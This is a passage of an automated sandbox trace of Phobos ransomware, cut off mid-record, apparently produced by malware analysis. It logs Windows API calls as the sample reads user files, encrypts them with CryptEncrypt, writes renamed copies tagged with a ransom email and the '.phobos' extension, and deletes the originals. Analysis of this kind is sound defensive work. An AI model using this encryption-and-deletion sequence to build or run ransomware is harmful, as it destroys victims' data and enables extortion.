dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0188.622] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2338) returned 1 [0188.622] CloseHandle (hObject=0x130) returned 1 [0188.623] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\msn[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\msn[1].htm")) returned 0x2020 [0188.623] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\msn[1].htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\msn[1].htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.623] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\msn[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\msn[1].htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0188.623] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0188.623] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0188.623] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\msn[1].htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\msn[1].htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0188.624] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0188.624] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0188.624] ReadFile (in: hFile=0x130, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x922, lpOverlapped=0x0) returned 1 [0188.720] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x930, dwBufLen=0x930 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x930) returned 1 [0188.720] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x930, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x930, lpOverlapped=0x0) returned 1 [0188.721] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a68) returned 1 [0188.721] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0188.721] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0188.721] CryptDestroyKey (hKey=0xa32a68) returned 1 [0188.721] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0188.722] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0188.722] CloseHandle (hObject=0x130) returned 1 [0188.722] CloseHandle (hObject=0x160) returned 1 [0188.722] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\msn[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\msn[1].htm")) returned 1 [0188.723] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0188.723] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\wc-addons[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\wc-addons[1].css"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0188.744] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=151530) returned 1 [0188.744] CloseHandle (hObject=0x178) returned 1 [0188.744] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\wc-addons[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\wc-addons[1].css")) returned 0x2020 [0188.744] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\wc-addons[1].css.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\wc-addons[1].css.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.744] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\wc-addons[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\wc-addons[1].css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0188.744] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0188.745] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0188.745] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\wc-addons[1].css.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\wc-addons[1].css.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0188.745] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d28) returned 1 [0188.745] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0188.745] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x24fea, lpOverlapped=0x0) returned 1 [0188.975] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x24ff0, dwBufLen=0x24ff0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x24ff0) returned 1 [0188.976] WriteFile (in: hFile=0x164, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x24ff0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x24ff0, lpOverlapped=0x0) returned 1 [0188.978] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0188.978] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0188.978] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0188.978] CryptDestroyKey (hKey=0xa327e8) returned 1 [0188.979] WriteFile (in: hFile=0x164, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0188.979] CryptDestroyKey (hKey=0xa32d28) returned 1 [0188.979] CloseHandle (hObject=0x178) returned 1 [0188.979] CloseHandle (hObject=0x164) returned 1 [0188.979] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\wc-addons[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\wc-addons[1].css")) returned 1 [0188.982] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0188.982] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0188.983] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2097152) returned 1 [0188.983] CloseHandle (hObject=0x164) returned 1 [0188.983] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.log")) returned 0x2020 [0188.983] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0188.984] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0188.984] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0188.984] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0188.984] ReadFile (in: hFile=0x164, lpBuffer=0x3190058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a0fa84, lpOverlapped=0x0 | out: lpBuffer=0x3190058*, lpNumberOfBytesRead=0x2a0fa84*=0x40000, lpOverlapped=0x0) returned 1 [0189.079] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xaaaaa, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0189.079] ReadFile (in: hFile=0x164, lpBuffer=0x31d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a0fa84, lpOverlapped=0x0 | out: lpBuffer=0x31d0058*, lpNumberOfBytesRead=0x2a0fa84*=0x40000, lpOverlapped=0x0) returned 1 [0189.138] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x1c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0189.138] ReadFile (in: hFile=0x164, lpBuffer=0x3210058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a0fa84, lpOverlapped=0x0 | out: lpBuffer=0x3210058*, lpNumberOfBytesRead=0x2a0fa84*=0x40000, lpOverlapped=0x0) returned 1 [0189.192] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa68, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fad4 | out: phKey=0x2a0fad4*=0xa32d28) returned 1 [0189.192] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0189.192] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa88*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa88*=0xc0050) returned 1 [0189.199] CryptDestroyKey (hKey=0xa32d28) returned 1 [0189.199] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fab0 | out: lpNewFilePointer=0x0) returned 1 [0189.199] WriteFile (in: hFile=0x164, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2a0fac0, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac0*=0xc0102, lpOverlapped=0x0) returned 1 [0189.221] SetEndOfFile (hFile=0x164) returned 1 [0189.221] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x1c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa80 | out: lpNewFilePointer=0x0) returned 1 [0189.221] WriteFile (in: hFile=0x164, lpBuffer=0x325013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a0fa8c, lpOverlapped=0x0 | out: lpBuffer=0x325013a*, lpNumberOfBytesWritten=0x2a0fa8c*=0x40000, lpOverlapped=0x0) returned 1 [0189.222] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xaaaaa, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa80 | out: lpNewFilePointer=0x0) returned 1 [0189.222] WriteFile (in: hFile=0x164, lpBuffer=0x325013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a0fa8c, lpOverlapped=0x0 | out: lpBuffer=0x325013a*, lpNumberOfBytesWritten=0x2a0fa8c*=0x40000, lpOverlapped=0x0) returned 1 [0189.224] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa80 | out: lpNewFilePointer=0x0) returned 1 [0189.224] WriteFile (in: hFile=0x164, lpBuffer=0x325013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a0fa8c, lpOverlapped=0x0 | out: lpBuffer=0x325013a*, lpNumberOfBytesWritten=0x2a0fa8c*=0x40000, lpOverlapped=0x0) returned 1 [0189.226] CloseHandle (hObject=0x164) returned 1 [0189.226] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0189.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\oeold.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0189.277] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=260) returned 1 [0189.277] CloseHandle (hObject=0x164) returned 1 [0189.277] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\oeold.xml")) returned 0x2020 [0189.277] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\oeold.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0189.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\oeold.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0189.277] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0189.277] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0189.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\oeold.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0189.278] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0189.278] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0189.278] ReadFile (in: hFile=0x164, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x104, lpOverlapped=0x0) returned 1 [0189.278] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110, dwBufLen=0x110 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110) returned 1 [0189.278] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x110, lpOverlapped=0x0) returned 1 [0189.279] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0189.279] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0189.279] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0189.279] CryptDestroyKey (hKey=0xa32c28) returned 1 [0189.279] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0189.280] CryptDestroyKey (hKey=0xa327e8) returned 1 [0189.280] CloseHandle (hObject=0x164) returned 1 [0189.280] CloseHandle (hObject=0x178) returned 1 [0189.280] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\oeold.xml")) returned 1 [0189.281] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0189.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0189.584] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1074) returned 1 [0189.584] CloseHandle (hObject=0x164) returned 1 [0189.584] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg")) returned 0x2020 [0189.584] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0189.584] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0189.584] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0189.584] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0189.584] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0189.585] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0189.585] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0189.585] ReadFile (in: hFile=0x164, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x432, lpOverlapped=0x0) returned 1 [0189.743] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x440, dwBufLen=0x440 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x440) returned 1 [0189.743] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x440, lpOverlapped=0x0) returned 1 [0189.744] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0189.745] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0189.745] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0189.745] CryptDestroyKey (hKey=0xa32c28) returned 1 [0189.745] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, 